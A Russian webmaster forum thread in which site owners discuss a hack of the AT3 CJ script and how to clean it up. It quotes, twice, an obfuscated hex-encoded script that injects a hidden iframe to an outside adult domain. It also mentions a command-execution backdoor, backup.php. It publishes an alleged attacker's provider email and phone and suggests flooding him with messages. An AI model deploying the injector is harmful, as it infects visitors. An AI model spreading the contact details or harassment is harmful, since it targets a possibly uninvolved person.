Новая тема   Ответить

 Revival
доброго времени суток...сегодня на сайтах заметил такую хреновину:
<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D70672E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>
заражаются файлы стрима face.html
и все html в директории tmp
если их удалять, они пересоздаються
что посоветуете сделать?

P.S.вчера только сделал абдейт стрима. Причем в админке показываеться нормальный шаблон..без кода

Последний раз редактировалось: Revival (19/01/08 в 17:59), всего редактировалось 2 раз(а)

 KpeBeg
Обратись ко мне в аську, может не из за движка вовсе. Помогу чем смогу.

Последний раз редактировалось: KpeBeg (18/01/08 в 20:08), всего редактировалось 1 раз

 ImmoX
Как эта вся срань надоела . И мудилы кому нехер делать.

 Tsumibit0
Если проблема в действительно стриме обязательно стукни к Душику... он человек адекватный, придумает чтонибуть....
тем более если пошла такая жара то походу это может стать общей проблемой.....

 color
попробуй из бэкапов которые стрим делает восстановиться

 pns
А ты закрыл ли x2.cgi?

И не остался в у тебя в стримовых бэкапах файл backup.php ?

Полностью ли была очищена файловая система после первого взлома?
Может это не "новый взлом", а дефейсы через остававшиеся файлы?

 dushik
почитайте пожалуйста топики про взлом at3, например Похоже, что 16-й билд ат3 такой же дырявый...
тот код который показывает топикстартер, вставляется в html файлы, которые могут найти при взломе этого cj-скрипта. Типичный случай (к сожалению).

зы. Быду признателен, если подправишь название топика ;)

 dushik
2Revival - поищи "левые" файлы, например backup.php. А также файлы содержащие:

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E68716D70672E636F6D2F66726565706F726E2F7468756D62732F7A2F7374617469632E706870222077696474683D32206865696768743D32207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

По всему серверу, после удаления - пересохрани темплейт. face.html можно вообще удалить.

 DiamonD
Revival, если не сложно, посмотри с какого айпи был добавлен левый трейдер по логам ат3.. скинь сюда..

 Kitaa
ко мне последний раз долбился с этого адреса 195.5.116.250 причем долбится он каждый день, но mod_security его запросы рубит, а ему пофиг видимо автоматом все делается.

 Revival
больше всего встречались:
64.20.33.150
86.203.108.178
91.121.96.134
79.220.59.76
212.24.224.17
остальных дофига, ломают ботами

195.5.116.250 особо старательный, до сих пор пробует
descr: Compic Ltd.
e-mail: roman@compic.ee
phone: +372 6321028
Спасибо большое всем кто помогал, особенно спс Dushik и одному хорошему человеку.

Предлагаю сделать отдельный раздел и выкладывать там все ИП с которых вас пытались ломать или ломали.

А еще предлагаю всем кого ломали скинуться на билет до Эстонии,отправить туда самого большого АВМа и выловить это особо умное тело с целью причинения телу травм :-)

 dushik

 DiamonD
Revival писал:

Этот Роман, кто он там, админ или нет, я не в курсе, но убитый на голову человек..
Кто-нить ему еще писал, интересно, кроме меня? Завалить его мессагами, дак может проймет человека..

 VirtualXL
Revival писал:

Дорвейшикам! ребята! добавьте етот email в поле при
сабмите дора в дружественные ресурсы !

 zevsus
Ахтунг!
Теперь эти господа научились подменять своим файлом стримовский cron.php

 miroz

А подробнее???

 webmaster
zevsus писал:

посмотрел этот филе - ничего подозрительного не заметил...
можно подробней - откуда взялись такие предположения ?

 zevsus
webmaster писал:

Увидел, что после чистки всех этих backup.php в файлах продолжает появляться злой код. Поковырявшись, заметил, что пхп код, который обычно содержится в backup.php находится в cron.php одного из стримов. Симптомы: сильно грузится сервак, в процессах висит php, запущенный от имени юзера, от которого запускается стримовский крон, а также несколько find-ов

Судя по логам взлом и подмена сron.php произведены всё через тот же ATL3 (16 билд) + оставили лазейку - файл backup.php, позволяющий выполнять команды на сервере.

Гадили с вот этого IP: 213.251.169.115

 inSect
Меня так же сломали. Нашел админ этот файл backup.php. Пришлось полностью чистить сервер. В связи с этим вопрос : как защищаться ?

 zevsus
inSect писал:

Это как? ОС переустановили?

 inSect
Я просто переехал на другой, а на том - все под реинсталл.

 kazantipman
вот и меня ломанули..симптомы как и выше

редирект с морды сиджа идет на

http://givemegirls.net/str/z/static.php
http://www.anal-xxx-slut.com/z/static.php

 Formator
Все юзаем CJLog Alerts Сервис уже многих спас от взлома и от длительных даунов сервака!

 Project
kazantipman писал:

Аналогично...
После обнаружения админы почистили все..., зловредный код вроде больше не появляется..., но файло backup.php все-равно откуда-то восстанавливается... Уже и бэкапы стрима килял и что только не делал...
Сиж так и не восстановился после расколбаса...

 zevsus
Project писал:

Стукни ко мне, расскажу где копать